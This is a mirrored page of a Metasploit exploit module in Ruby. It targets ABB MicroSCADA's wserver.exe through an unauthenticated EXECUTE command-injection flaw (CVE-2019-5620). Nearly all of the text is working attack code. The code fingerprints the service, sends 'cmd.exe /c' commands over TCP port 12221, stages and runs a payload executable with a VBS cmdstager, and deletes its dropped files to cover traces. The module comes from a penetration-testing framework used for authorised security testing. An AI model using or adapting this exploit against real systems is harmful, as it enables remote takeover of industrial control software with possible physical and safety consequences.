CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/abb_wserver_exec.rb
Views: 11623
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
include Msf::Exploit::CmdStager
11
12
def initialize(info = {})
13
super(update_info(info,
14
'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',
15
'Description' => %q{
16
This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
17
issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
18
component, which allows arbitrary commands. The component is disabled by default, but
19
required when a project uses the SCIL function WORKSTATION_CALL.
20
21
This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on
22
Windows XP SP3 and Windows 7 SP1.
23
},
24
'License' => MSF_LICENSE,
25
'Author' =>
26
[
27
'Brian Gorenc', # Original discovery
28
'juan vazquez' # Metasploit module
29
],
30
'References' =>
31
[
32
[ 'CVE', '2019-5620' ],
33
[ 'OSVDB', '100324'],
34
[ 'ZDI', '13-270' ],
35
[ 'URL', 'https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']
36
],
37
'Platform' => 'win',
38
'Arch' => ARCH_X86,
39
'DefaultOptions' =>
40
{
41
'WfsDelay' => 5
42
},
43
'Targets' =>
44
[
45
[ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
46
],
47
'CmdStagerFlavor' => 'vbs',
48
'DefaultTarget' => 0,
49
'Privileged' => false,
50
'DisclosureDate' => '2013-04-05'
51
))
52
53
register_options([Opt::RPORT(12221)])
54
end
55
56
def check
57
58
# Send an EXECUTE packet without command, a valid response
59
# should include an error code, which is good enough to
60
# fingerprint.
61
op = "EXECUTE\x00"
62
pkt_length = [4 + op.length].pack("V") # 4 because of the packet length
63
pkt = pkt_length
64
pkt << op
65
66
connect
67
sock.put(pkt)
68
res = sock.get_once
69
disconnect
70
71
if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001
72
return Exploit::CheckCode::Vulnerable
73
end
74
75
return Exploit::CheckCode::Safe
76
77
end
78
79
def exploit
80
# More then 750 will trigger overflow...
81
# Cleaning is done by the exploit on execute_cmdstager_end
82
execute_cmdstager({:linemax => 750, :nodelete => true})
83
end
84
85
def execute_cmdstager_end(opts)
86
@var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
87
@var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
88
@var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
89
@var_decoder = @stager_instance.instance_variable_get(:@var_decoder)
90
print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")
91
execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})
92
print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")
93
execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})
94
print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")
95
execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})
96
end
97
98
def execute_command(cmd, opts)
99
op = "EXECUTE\x00"
100
command = "cmd.exe /c #{cmd}"
101
pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length
102
103
pkt = pkt_length
104
pkt << op
105
pkt << command
106
107
connect
108
sock.put(pkt)
109
res = sock.get_once
110
disconnect
111
112
unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1
113
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")
114
end
115
end
116
end
117
118